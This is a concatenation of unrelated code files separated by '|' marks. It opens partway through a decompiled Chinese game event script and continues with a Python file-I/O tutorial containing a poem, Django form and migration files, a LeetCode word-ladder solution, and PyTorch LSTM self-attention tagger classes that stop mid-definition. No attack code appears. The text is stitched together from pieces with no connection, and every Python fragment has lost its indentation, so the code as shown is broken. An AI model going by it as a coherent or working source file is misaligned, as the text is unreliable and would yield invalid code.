"#505F(电脑?数据库?)\x02",
)
CloseMessageWindow()
FadeToDark(1000, 0, -1)
OP_0D()
OP_6D(198940, 30, -23590, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
SetChrPos(0x101, 199360, 10, -24480, 0)
SetChrPos(0x102, 198190, 20, -24530, 0)
SetChrPos(0x107, 199160, 20, -22710, 0)
SetChrFlags(0x107, 0x4)
Sleep(500)
FadeToBright(1000, 0)
OP_0D()
ChrTalk(
0x107,
"#062F#4P……嘿咻。\x02",
)
CloseMessageWindow()
OP_72(0x1, 0x4)
Sleep(100)
OP_71(0x1, 0x4)
Sleep(100)
OP_72(0x1, 0x4)
Sleep(100)
OP_71(0x1, 0x4)
Sleep(90)
OP_72(0x1, 0x4)
Sleep(80)
OP_71(0x1, 0x4)
Sleep(70)
OP_72(0x1, 0x4)
Sleep(60)
OP_71(0x1, 0x4)
Sleep(50)
OP_72(0x1, 0x4)
Sleep(1000)
ChrTalk(
0x107,
"#560F#4P好~这样就可以了。\x02",
)
CloseMessageWindow()
OP_8F(0x107, 0x309BC, 0x1E, 0xFFFFA4DE, 0x7D0, 0x0)
OP_8C(0x107, 180, 400)
ClearChrFlags(0x107, 0x4)
ChrTalk(
0x107,
"#061F#1P让你们久等了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#501F哎~好厉害。\x01",
"原来你这么熟练的啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F真不愧是\x01",
"在中央工房的见习生啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#067F#1P嘿嘿……\x01",
"这不算什么啦。\x02\x03",
"只不过是修正接触不良的结晶回路\x01",
"和调整错乱的导力压而已。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#505F???\x02\x03",
"唔……\x01",
"听起来好像相当复杂的样子呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#560F其实一点也不复杂。\x02\x03",
"这个呢,\x01",
"简单解释起来的话……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#1K#1P在导力器的内部镶嵌着\x01",
"可以发挥各种功能的结晶回路。\x01",
"结晶回路与元件必须准确地\x01",
"进行连接才能使导力器正常运作,\x01",
"而当两者出现连接错误时,\x01",
"导力器生成的导力就会无处可去,\x01",
"其结果自然就导致\x01",
"设计时预想的机能无法正常发挥。\x01",
"以照明灯的情况来说就是发光和驱除魔兽的……\x02",
)
)
Sleep(2000)
OP_62(0x101, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
ChrTalk(
0x101,
"#1K#004F停、停一下!\x02",
)
OP_56(0x1)
OP_59()
ChrTalk(
0x101,
(
"#506F还、还是以后再慢慢解释吧。\x01",
"我们差不多该出发了呢~\x02\x03",
"嗯嗯~\x01",
"站在这里说话也不方便嘛。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#067F#1P啊,说得也是。\x01",
"虽然没解释完有点可惜……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#007F(呼……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F哈哈,\x01",
"那我们继续前往蔡斯吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#006FOK!\x02",
)
CloseMessageWindow()
ChrTalk(
0x107,
"#061F#1P好的。\x02",
)
CloseMessageWindow()
ClearChrFlags(0x101, 0x1000)
ClearChrFlags(0x102, 0x1000)
OP_64(0x0, 0x1)
EventEnd(0x0)
label("loc_1E51")
Return()
# Function_4_637 end
def Function_5_1E52(): pass
label("Function_5_1E52")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"这是一台可供旅行者回复体力的导力器装置。\x07\x00\x02",
)
)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Menu(
0,
10,
32,
1,
(
"在此休息\x01", # 0
"离开\x01", # 1
)
)
MenuEnd(0x1)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_5F(0x0)
OP_56(0x0)
Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2071")
FadeToBright(100, 0)
Sleep(500)
SoundLoad(13)
OP_82(0x0, 0x2)
PlayEffect(0x0, 0x2, 0xFF, 285640, 1000, -26290, 0, 0, 0, 700, 700, 700, 0xFF, 0, 0, 0, 0)
OP_6F(0x11, 0)
OP_70(0x11, 0x32)
OP_73(0x11)
OP_20(0xBB8)
OP_22(0xC, 0x0, 0x64)
OP_82(0x2, 0x2)
LoadEffect(0x1, "map\\\\mp027_01.eff")
PlayEffect(0x1, 0x1, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1500, 1500, 1500, 0xFF, 0, 0, 0, 0)
FadeToDark(1000, 0, -1)
Sleep(700)
OP_22(0xD, 0x0, 0x64)
OP_0D()
OP_31(0x0, 0xFE, 0x0)
OP_31(0x1, 0xFE, 0x0)
OP_31(0x2, 0xFE, 0x0)
OP_31(0x3, 0xFE, 0x0)
OP_31(0x4, 0xFE, 0x0)
OP_31(0x5, 0xFE, 0x0)
OP_31(0x6, 0xFE, 0x0)
OP_31(0x7, 0xFE, 0x0)
SetChrPos(0x0, 285600, 30, -28390, 13)
SetChrPos(0x1, 285600, 30, -28390, 13)
SetChrPos(0x2, 285600, 30, -28390, 13)
SetChrPos(0x3, 285600, 30, -28390, 13)
OP_69(0x0, 0x0)
OP_30(0x0)
Sleep(3500)
OP_82(0x1, 0x2)
LoadEffect(0x0, "map\\\\mp027_00.eff")
PlayEffect(0x0, 0x0, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1300, 1300, 1300, 0xFF, 0, 0, 0, 0)
OP_6F(0x11, 0)
OP_1E()
FadeToBright(1000, 0)
OP_56(0x0)
TalkEnd(0xFF)
Return()
label("loc_2071")
Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_208B")
FadeToBright(300, 0)
TalkEnd(0xFF)
Return()
label("loc_208B")
Return()
# Function_5_1E52 end
SaveToFile()
Try(main)
|
import time
import sys
# file = open('flush.txt','w')
# file.write('a')
# # file.flush()
# time.sleep(20)
# file.close()
#
# for i in range(20):
# # sys.stdout.write('#')
# # sys.stdout.flush()
# print('#',end='')
# time.sleep(0.2)
# file = open('flush.txt','a')
# # file.write('a')
# file.truncate(1) # 截断,不加参数默认从起始位置开始截断
# file.fileno() # 返回一个文件操作符,是一个非负整形的数,唯一的代表
# file.close()
'''
昨夜寒蛰不住鸣。
惊回千里梦,已三更。
起来独自绕阶行。
人悄悄,帘外月胧明。
白首为功名,旧山松竹老,阻归程。
欲将心事付瑶琴。
知音少,弦断有谁听。
'''
# r+ 读写模式,w+ 写读模式,a+ 追加读模式
# file = open('小重山.txt','r+')
# print(file.readline())
# print('###')
# # file.seek(10)
# file.write('1111')
# print(file.readline())
# file.close()
# file = open('小重山.txt','w+')
# print(file.readline())
# file.write('111111')
# # file.seek(0)
# print(file.readline())
# file.close()
# 终极问题
# 在第六行末尾添加alex
# 只能复制一份
file = open('小重山.txt','r+')
file2 = open('小重山2.txt','w+')
number = 1
for line in file:
if number == 6:
line = ''.join([line.strip(),'alex\n'])
file2.write(line)
file2.flush()
number +=1
file.close()
# file2.flush()
for f in file2:
print(f)
file2.close()
with open('log','r') as f:
f.readlines()
f.read()
# 退出with代码块后,会自动关闭文件
print('hello')
# with 同时管理多个文件对象
with open('file1','r') as file1,open('file2','w') as file2:
file1.read()
|
from django import forms
from .models import Candidato, Experiencia
class CandidateForm(forms.ModelForm):
class Meta:
model = Candidato
fields = (
'cedula',
'nombre',
'puesto',
'departamento',
'salario_aspira',
'competencias',
'capacitaciones',
'experiencias',
'recomendado_por',
)
class ExperienciaForm(forms.ModelForm):
class Meta:
model = Experiencia
fields = (
'empresa',
'puesto_ocupado',
'fecha_desde',
'fecha_hasta',
'salario',
)
|
class Solution:
def ladderLength(self, beginWord, endWord, WordList):
from collections import deque
from string import ascii_lowercase
WordList.add(endWord)
n = len(beginWord)
queue = deque([(beginWord, 1)])
while queue:
word, res = queue.popleft()
if word == endWord: return res
for i in xrange(n):
for ch in ascii_lowercase:
if word[i] == ch: continue
new = word[:i] + ch + word[i+1:]
if new in WordList:
queue.append((new, res + 1))
WordList.remove(new)
return 0 |
# Generated by Django 3.0.8 on 2020-11-05 16:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('LandingPage', '0004_auto_20201103_1935'),
('campus', '0002_auto_20201105_2214'),
]
operations = [
migrations.RemoveField(
model_name='campus',
name='course_name',
),
migrations.AddField(
model_name='campus',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='campus_course', to='LandingPage.Course'),
),
]
|
# -*- coding: utf8 -*-
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.init
import torch.nn.functional as F
# import numpy as np
from loader import CAP_DIM
from torch.autograd import Variable
import math
'''
def _calculate_fan_in_and_fan_out(tensor):
dimensions = tensor.ndimension()
if dimensions < 2:
raise ValueError("Fan in and fan out can not be computed for tensor with less than 2 dimensions")
if dimensions == 2: # Linear
fan_in = tensor.size(1)
fan_out = tensor.size(0)
else:
num_input_fmaps = tensor.size(1)
num_output_fmaps = tensor.size(0)
receptive_field_size = 1
if tensor.dim() > 2:
receptive_field_size = tensor[0][0].numel()
fan_in = num_input_fmaps * receptive_field_size
fan_out = num_output_fmaps * receptive_field_size
return fan_in, fan_out
def xavier_normal(tensor, gain=1):
if isinstance(tensor, Variable):
xavier_normal(tensor.data, gain=gain)
return tensor
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
std = gain * math.sqrt(2.0 / (fan_in + fan_out))
return tensor.normal_(0, std)
def xavier_uniform(tensor, gain=1):
if isinstance(tensor, Variable):
xavier_uniform(tensor.data, gain=gain)
return tensor
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
std = gain * math.sqrt(2.0 / (fan_in + fan_out))
a = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation
return tensor.uniform_(-a, a)
'''
class Base(nn.Module):
def __init__(self, param):
super(Base, self).__init__()
#self.device = 0
def init_embed(self, init_matrix):
if self.use_cuda:
self.embed.weight = nn.Parameter(torch.FloatTensor(init_matrix).cuda(self.device))
self.embed_weight = self.embed.weight
else:
self.embed.weight = nn.Parameter(torch.FloatTensor(init_matrix))
def predict(self, words):
#TODO: caps
output = self.forward(words)
_, tag_id = torch.max(output, dim=0)
return tag_id
def get_loss(self, tags, words):
logit = self.forward(words)
loss = F.cross_entropy(logit, tags)
#loss = F.cross_entropy(self, tags)
return loss
class JointLSTM(Base):
def __init__(self, param):
super(JointLSTM, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.r = param['r']
self.bilstm = param['bilstm']
self.c0 = param['c0']
self.c1 = param['c1']
self.device = param['device']
self.batch = param['batch_size']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm1 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
self.lstm2 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u * 2, self.r, bias=False).cuda(self.device)
#self.attn2 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u * 2, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
self.tagger = nn.Linear(self.u, self.c1).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False)
self.attn2 = nn.Linear(self.u, self.r, bias=False)
self.mlp1 = nn.Linear(self.u, 1)
self.mlp2 = nn.Linear(self.r, self.c0)
self.tagger = nn.Linear(self.r, self.c1)
self.tanh = nn.Tanh()
self.softmax = nn.Softmax()
def forward(self, idx, words):
#self.embed.weight = self.embed_weight
embeds = self.embed(words)
batch = embeds.size(1)
slen = embeds.size(0)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
if idx == 0:
H, self.hidden = self.lstm1(embeds)
H2, self.hidden = self.lstm2(embeds)
H = torch.cat((H, H2), 2)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.view(batch * slen, self.u*2)
if self.debug:
print('H', H.size())
A = self.attn1(H)
if self.debug:
print('A', A.size())
A = A.view(slen, batch, self.r)
H = H.view(slen, batch, self.u * 2)
H = torch.transpose(H, 0, 1)
A = torch.transpose(A, 0, 1)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
M = M.view(batch * self.r, -1)
mlp1 = F.relu(self.mlp1(M))
mlp1 = mlp1.view(batch, -1)
if self.debug:
print('mlp1', mlp1.size())
mlp2 = F.relu(self.mlp2(mlp1))
if self.debug:
print('mlp2', mlp2.size())
out = F.softmax(mlp2)
else:
H, self.hidden = self.lstm2(embeds)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.view(batch * slen, self.u)
if self.debug:
print('H', H.size())
#A = self.attn2(H)
A = H
if self.debug:
print('A', A.size())
out = self.tagger(A)
self.debug = False
return out
class ShareLSTM2(Base):
def __init__(self, param):
super(ShareLSTM2, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.r = param['r']
self.bilstm = param['bilstm']
self.c0 = param['c0']
self.c1 = param['c1']
self.device = param['device']
self.batch = param['batch_size']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
self.attn2 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
self.tagger = nn.Linear(self.r, self.c1).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False)
self.attn2 = nn.Linear(self.u, self.r, bias=False)
self.mlp1 = nn.Linear(self.u, 1)
self.mlp2 = nn.Linear(self.r, self.c0)
self.tagger = nn.Linear(self.r, self.c1)
self.tanh = nn.Tanh()
self.softmax = nn.Softmax()
def forward(self, idx, words):
embeds = self.embed(words)
batch = embeds.size(1)
slen = embeds.size(0)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.view(batch * slen, self.u)
if self.debug:
print('H', H.size())
if idx == 0:
A = self.attn1(H)
if self.debug:
print('A', A.size())
A = A.view(slen, batch, self.r)
H = H.view(slen, batch, self.u)
H = torch.transpose(H, 0, 1)
A = torch.transpose(A, 0, 1)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
M = M.view(batch * self.r, -1)
mlp1 = F.relu(self.mlp1(M))
mlp1 = mlp1.view(batch, -1)
if self.debug:
print('mlp1', mlp1.size())
mlp2 = F.relu(self.mlp2(mlp1))
if self.debug:
print('mlp2', mlp2.size())
out = F.softmax(mlp2)
else:
A = self.attn2(H)
if self.debug:
print('A', A.size())
out = self.tagger(A)
self.debug = False
return out
class ShareLSTM(Base):
def __init__(self, param):
super(ShareLSTM, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.r = param['r']
self.bilstm = param['bilstm']
self.c0 = param['c0']
self.c1 = param['c1']
self.batch = param['batch_size']
self.device = param['device']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
self.tagger = nn.Linear(self.r, self.c1).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False)
self.mlp1 = nn.Linear(self.u, 1)
self.mlp2 = nn.Linear(self.r, self.c0)
self.tagger = nn.Linear(self.r, self.c1)
self.tanh = nn.Tanh()
self.softmax = nn.Softmax()
def forward(self, idx, words):
embeds = self.embed(words)
batch = embeds.size(1)
slen = embeds.size(0)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.view(batch * slen, self.u)
if self.debug:
print('H', H.size())
A = self.attn1(H)
if self.debug:
print('A', A.size())
if idx == 0:
A = A.view(slen, batch, self.r)
H = H.view(slen, batch, self.u)
H = torch.transpose(H, 0, 1)
A = torch.transpose(A, 0, 1)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
M = M.view(batch * self.r, -1)
mlp1 = F.relu(self.mlp1(M))
mlp1 = mlp1.view(batch, -1)
if self.debug:
print('mlp1', mlp1.size())
mlp2 = F.relu(self.mlp2(mlp1))
if self.debug:
print('mlp2', mlp2.size())
out = F.softmax(mlp2)
else:
out = self.tagger(A)
self.debug = False
return out
class LSTMTagger(Base):
def __init__(self, param):
super(LSTMTagger, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.da = param['da']
self.r = param['r']
self.bilstm = param['bilstm']
self.c = param['tagset_size']
self.batch = param['batch_size']
self.debug = True
self.device = param['device']
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
# TODO 这里如果使用first_batch会对性能优很大损耗,这是为什么呢?
self.lstm = nn.LSTM(self.e, self.u, bias=False).cuda(self.device)
self.attn = nn.Linear(self.u, self.r).cuda(self.device)
self.tagger = nn.Linear(self.r, self.c).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bias=False)
self.attn = nn.Linear(self.u, self.r)
self.tagger = nn.Linear(self.r, self.c)
#self.hidden = self.init_hidden()
#self.loss_function = nn.NLLLoss()
def init_hidden(self):
# Before we've done anything, we dont have any hidden state.
# Refer to the Pytorch documentation to see exactly why they have this dimensionality.
# The axes semantics are (num_layers, minibatch_size, hidden_dim)
return (autograd.Variable(torch.Tensor(1, 1, self.lstm_dim)),
autograd.Variable(torch.Tensor(1, 1, self.lstm_dim)))
def forward(self, words):
#words.data.t_()
if self.debug:
print('words:', words.size())
embeds = self.embed(words)
if self.debug:
print('embeds:', embeds.size())
H, self.hidden = self.lstm(embeds)
H = H.contiguous().view(-1, self.u)
if self.debug:
print('H:', H.size())
A = self.attn(H)
#A = H
if self.debug:
print('A:', A.size())
#A = F.softmax(self.attn(H)) 严重影响收敛
tag_space = self.tagger(A)
#out = F.softmax(tag_space) #严重影响收敛
out = tag_space
if self.debug:
print('out:', out.size())
self.debug = False
return out
def get_tags(self, words):
tag_scores = self.forward(words)
_, tags = torch.max(tag_scores, dim=1)
tags = tags.data.numpy().reshape((-1,))
return tags
def get_loss(self, tags, words):
tag_scores = self.forward(words=words)
loss = self.loss_function(tag_scores, tags)
return loss
class SelfAttnTagger(Base):
def __init__(self, param):
super(SelfAttnTagger, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.da = param['da']
self.r = param['r']
self.bilstm = param['bilstm']
self.c = param['tagset_size']
self.batch = param['batch_size']
self.device = param['device']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, batch_first=True).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
#self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, batch_first=True)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da)
self.attn2 = nn.Linear(self.da, self.r)
#self.mlp1 = nn.Linear(self.u, 1)
self.mlp2 = nn.Linear(self.r, self.c)
self.tanh = nn.Tanh()
self.softmax = nn.Softmax()
def forward(self, words):
words = words.squeeze()
words.data.t_()
embeds = self.embed(words)
batch = embeds.size(0)
slen = embeds.size(1)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.contiguous().view(batch * slen, self.u)
if self.debug:
print('H', H.size())
Attn1 = self.tanh(self.attn1(H))
if self.debug:
print('Attn1', Attn1.size())
Attn2 = self.attn2(Attn1)
if self.debug:
print('Attn2', Attn2.size())
A = self.softmax(Attn2)
A = A.view(batch, slen, self.r)
if self.debug:
print('A', A.size())
A = A.view(batch * slen, self.r)
mlp2 = self.mlp2(A)
if self.debug:
print('mlp2', mlp2.size())
out = F.softmax(mlp2)
self.debug = False
return out
def get_loss(self, tags, words):
logit = self.forward(words)
loss = F.cross_entropy(logit, tags)
#loss = F.cross_entropy(self, tags)
return loss
class NewSelfAttn(Base):
# SelfAttn without batch_first
def __init__(self, param):
super(NewSelfAttn, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.r = param['r']
self.bilstm = param['bilstm']
self.c = param['tagset_size']
self.batch = param['batch_size']
self.device = param['device']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.r)
self.mlp1 = nn.Linear(self.u, 1)
self.mlp2 = nn.Linear(self.r, self.c)
self.tanh = nn.Tanh()
self.softmax = nn.Softmax()
def forward(self, words):
embeds = self.embed(words)
batch = embeds.size(1)
slen = embeds.size(0)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.view(batch * slen, self.u)
if self.debug:
print('H', H.size())
#A = self.tanh(self.attn1(H))
A = self.attn1(H)
if self.debug:
print('A', A.size())
#A = self.softmax(Attn2)
A = A.view(slen, batch, self.r)
H = H.view(slen, batch, self.u)
H = torch.transpose(H, 0, 1)
A = torch.transpose(A, 0, 1)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
M = M.view(batch * self.r, -1)
mlp1 = F.relu(self.mlp1(M))
mlp1 = mlp1.view(batch, -1)
if self.debug:
print('mlp1', mlp1.size())
mlp2 = F.relu(self.mlp2(mlp1))
if self.debug:
print('mlp2', mlp2.size())
out = F.softmax(mlp2)
self.debug = False
return out
class JKSelfAttn(Base):
'''Self attention copy jkchen's tensorflow codes'''
def __init__(self, param):
super(JKSelfAttn, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.da = param['da']
self.r = param['r']
self.bilstm = param['bilstm']
self.c = param['tagset_size']
self.batch = param['batch_size']
self.device = param['device']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u, self.c).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da)
self.attn2 = nn.Linear(self.da, self.r)
self.mlp1 = nn.Linear(self.u, self.c)
self.mlp2 = nn.Linear(self.r, self.c)
'''
self.lstm.apply(self.weight_init)
self.attn1.apply(self.weight_init)
self.attn2.apply(self.weight_init)
self.mlp1.apply(self.weight_init)
self.mlp2.apply(self.weight_init)
'''
def weight_init(self, m):
if isinstance(m, nn.LSTM):
for _a in m.all_weights[0]:
if len(_a.size()) == 1:
continue
nn.init.xavier_uniform(_a)
if isinstance(m, nn.Linear):
m.weight.data = nn.init.xavier_uniform(m.weight.data)
def dist(self, tensor):
b = tensor.cpu().data.numpy()
mean = b.sum(0) / b.shape[0]
import numpy as np
c = np.array([np.linalg.norm(b[i] - mean) for i in range(b.shape[0])])
return np.std(c)
def forward(self, words, log=False):
words = words.squeeze()
words.data.t_()
embeds = self.embed(words)
batch = embeds.size(0)
slen = embeds.size(1)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if log:
print('H std:', self.dist(H))
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.contiguous().view(batch * slen, self.u)
if self.debug:
print('H', H.size())
Attn1 = F.tanh(self.attn1(H))
if self.debug:
print('Attn1', Attn1.size())
Attn2 = self.attn2(Attn1)
if self.debug:
print('Attn2', Attn2.size())
A = F.softmax(Attn2)
A = A.view(batch, slen, self.r)
H = H.view(batch, slen, self.u)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
if log:
print('M std:', self.dist(M))
#print(M)
M = torch.mean(M, 1)
M = M.squeeze()
if self.debug:
print('M', M.size())
mlp1 = self.mlp1(M)
if self.debug:
print('mlp1', mlp1.size())
#out = F.softmax(mlp1)
out = mlp1
self.debug = False
return out
class SingleSelfAttn(Base):
def __init__(self, param):
super(SingleSelfAttn, self).__init__(param)
self.use_cuda = param['use_cuda']
self.v = param['vocab_size']
self.e = param['embed_dim']
self.u = param['lstm_dim']
self.da = param['da']
self.r = param['r']
self.bilstm = param['bilstm']
self.c = param['tagset_size']
self.batch = param['batch_size']
self.device = param['device']
if 'debug' in param:
self.debug = param['debug']
else:
self.debug = False
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True).cuda(self.device)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
else:
self.embed = nn.Embedding(self.v, self.e)
self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True)
if self.bilstm:
self.u = self.u * 2
self.attn1 = nn.Linear(self.u, self.da)
self.attn2 = nn.Linear(self.da, self.r)
self.mlp1 = nn.Linear(self.u, 1)
